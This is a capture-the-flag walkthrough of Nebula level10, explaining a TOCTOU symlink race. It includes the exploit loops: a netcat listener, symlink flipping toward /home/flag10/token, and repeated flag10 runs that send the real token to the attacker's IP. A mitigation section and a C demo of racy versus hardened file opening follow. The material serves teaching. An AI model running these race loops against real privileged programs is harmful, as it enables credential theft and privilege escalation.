
Nebula Level10: A Newbie’s Approach

Level10 introduces the time-of-check to time-of-use (TOCTOU) race condition, which is well described on the CWE website (CWE-367).

What you’ll need to know…

  • C

Level10

I’ll quickly explain the TOCTOU vulnerability using a simple example. Consider the following lines of code.

#include <stdio.h>
#include <unistd.h>

/* Time of check: access() tests the path name, using the real UID */
if (access(abc_file, W_OK) == 0) {
  /* Time of use: fopen() resolves the same path name a second time */
  FILE *fp = fopen(abc_file, "w+");
  if (fp != NULL) {
    fputs("moveax", fp);
    fclose(fp);
  }
}
else {
  fprintf(stderr, "Sorry, but you don't have permissions to write to this file!\n");
}

It's a simple piece of code: it checks whether you have write access to abc_file. If you do, it opens the file and writes moveax; if you don't, it prints a message to stderr. So the "time of check" is the access() call and the "time of use" is the fopen() call. Nothing guarantees that the path name still refers to the same file when the second call resolves it.

Now imagine a user with malicious intent who, in parallel with the program above, keeps replacing abc_file in a loop with a symbolic link to an important file (passwd, maybe). If one of those replacements lands between the check and the use, access() is answered for a file the user is allowed to write, but fopen() follows the link to its new target: JACKPOT! This matters for set-UID programs in particular, because access() decides using the real UID while fopen() opens with the effective (privileged) one. One note: most of the attempts will fail, because the link was already swapped before the if clause (and access() then says no) or only after the file was opened. You'll see this while we solve the level10 challenge.

In the level10 source, line 24 is the time of check (the access() call) and line 54 is the time of use (the open() call).

First of all, let's get netcat listening on port 18211, the port flag10 sends the file to. You can do this in the same VM or in another one by running while true; do nc -lv 18211; done (Linux) or FOR /L %N IN () DO nc -lvp 18211 (Windows).

Second, we need to create a fake token file that we can read, for example /tmp/sometoken. Next, we create a symbolic link in our home directory, /home/level10/token, and keep flipping it between the fake token and the real one, /home/flag10/token. Important note: this has to be done repeatedly, in a loop, so that sooner or later the instructions execute in the order presented below.

Ideal instruction order:

ln -sf /tmp/sometoken /home/level10/token;
if(access(argv[1], R_OK) == 0) {
...
ln -sf /home/flag10/token /home/level10/token;
...
ffd = open(file, O_RDONLY);

Now we just need to keep running flag10 so that it keeps trying to send the file: run while true; do /home/flag10/flag10 /home/level10/token <your IP>; done. Every run that hits the window between the check and the open sends the real token to your listener.

The following image shows the commands that I executed in order to read the token file.

[Image: commands]

After this point you can see two files in the home directory: the symbolic link and the output_level10 file.

[Image: Files]

If you go ahead and read the output_level10 file, you'll find the contents of the real token, which is the password of the flag10 account.

[Image: Result level10]

Notice that there are a lot of failed tries, as I said.

Let's now try to log in to the flag10 account…

[Image: Solution]

There you go. Challenge level10 solved!

Challenges completed: 11/20

Mitigation

TOCTOU race conditions are hard to eliminate because the check and the use are separated in time, and the file system can change in between. The reliable way to avoid them is to stop checking path names at all: open the file first and make every decision on the resulting file descriptor (fstat() instead of stat() or access(), fchmod() instead of chmod(), and so on), since the descriptor keeps referring to the same file no matter where the name points afterwards. A set-UID program like flag10 should also drop privileges to the real user before opening the file, rather than emulating the permission check with access(), and can pass O_NOFOLLOW to refuse symbolic links outright.
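The following C program is an added illustration of both the race explained at the start of this post and the mitigation above; it is not part of the original walkthrough or of the Nebula source. Instead of a second process racing with ln -sf, a callback stands in for the attacker and is invoked inside the check-to-use window, so the outcome is deterministic. The file names, token contents and the function names (vuln_open, safe_open and the demo_* helpers) are all assumptions made for the demo.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Constructed demo data in a fresh mkdtemp() dir: a token we may read and a
 * "real" one we should only obtain if the victim is racy. */
#define FAKE_TOKEN "fake token\n"
#define REAL_TOKEN "real token\n"
static char g_dir[PATH_MAX], g_fake[PATH_MAX], g_secret[PATH_MAX], g_link[PATH_MAX];

/* Vulnerable pattern from flag10: check the *path* with access() (real UID),
 * then open the same path. `between` stands in for the attacker's "ln -sf". */
int vuln_open(const char *path, void (*between)(void)) {
    if (access(path, R_OK) != 0) return -1;   /* time of check */
    if (between) between();                   /* attacker re-points the link */
    return open(path, O_RDONLY);              /* time of use: follows the new link */
}

/* Hardened: open first, never through a symlink, then decide on the descriptor;
 * whatever the path points to afterwards cannot change what fd refers to.
 * Caveat: O_NOFOLLOW covers only the final path component, and a set-UID
 * program should additionally drop privileges (seteuid(getuid())) first. */
int safe_open(const char *path, void (*between)(void)) {
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;                    /* errno == ELOOP for a symlink */
    if (between) between();                   /* too late: fd is already bound */
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != getuid()) {
        close(fd); errno = EACCES; return -1;
    }
    return fd;
}

static int write_file(const char *path, const char *data) {
    FILE *f = fopen(path, "w");
    if (f == NULL) return -1;
    fputs(data, f);
    return fclose(f);
}

/* Re-point g_link atomically: create the new symlink under a temporary name
 * and rename() it over the old one. "ln -sf" does unlink()+symlink() instead,
 * leaving an instant with no link at all (one source of the failed tries). */
static int point_link_at(const char *target) {
    char tmp[PATH_MAX];
    snprintf(tmp, sizeof tmp, "%s.new", g_link);
    unlink(tmp);
    if (symlink(target, tmp) != 0) return -1;
    return rename(tmp, g_link);
}
static void swap_to_secret(void) { point_link_at(g_secret); }

/* Read the small file behind fd, close it, and return 1 if it equals `expect`. */
static int fd_matches(int fd, const char *expect) {
    char buf[64] = {0};
    ssize_t n = read(fd, buf, sizeof buf - 1);
    close(fd);
    return n >= 0 && strcmp(buf, expect) == 0;
}

int setup_demo(void) {
    strcpy(g_dir, "/tmp/toctou-XXXXXX");
    if (mkdtemp(g_dir) == NULL) return -1;
    snprintf(g_fake, sizeof g_fake, "%s/sometoken", g_dir);
    snprintf(g_secret, sizeof g_secret, "%s/flag10_token", g_dir);
    snprintf(g_link, sizeof g_link, "%s/token", g_dir);
    if (write_file(g_fake, FAKE_TOKEN) || write_file(g_secret, REAL_TOKEN)) return -1;
    return point_link_at(g_fake);
}
void cleanup_demo(void) { unlink(g_link); unlink(g_fake); unlink(g_secret); rmdir(g_dir); }

/* 1 if the racy victim handed over REAL_TOKEN although access() saw the fake one. */
int demo_vuln(void) {
    if (point_link_at(g_fake) != 0) return -1;
    int fd = vuln_open(g_link, swap_to_secret);
    return fd < 0 ? -1 : fd_matches(fd, REAL_TOKEN);
}

/* errno the hardened victim fails with when handed the symlink (expected: ELOOP). */
int demo_safe_via_link(void) {
    if (point_link_at(g_fake) != 0) return -1;
    int fd = safe_open(g_link, swap_to_secret);
    return fd < 0 ? errno : (close(fd), 0);
}

/* 1 if the hardened victim still serves a plain file that we own. */
int demo_safe_direct(void) {
    int fd = safe_open(g_fake, swap_to_secret);
    return fd < 0 ? -1 : fd_matches(fd, FAKE_TOKEN);
}

int main(void) {
    if (setup_demo() != 0) { perror("setup_demo"); return 1; }
    printf("racy access()+open() leaked the real token: %d\n", demo_vuln());
    printf("safe_open() on the symlink failed with errno %d (ELOOP is %d)\n", demo_safe_via_link(), ELOOP);
    printf("safe_open() on a plain file we own read it: %d\n", demo_safe_direct());
    cleanup_demo(); return 0;
}
```

Build it with gcc -Wall toctou_demo.c -o toctou_demo and run it from any directory with a writable /tmp. The racy path hands over the real token every time here because the swap is forced into the window; in the real challenge the same swap only lands there by luck, which is why the loop is needed. Note also that the flipper uses symlink() plus rename() rather than ln -sf: the rename is atomic, so there is never a moment when the path does not exist, which removes one whole class of failed tries from the attack.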
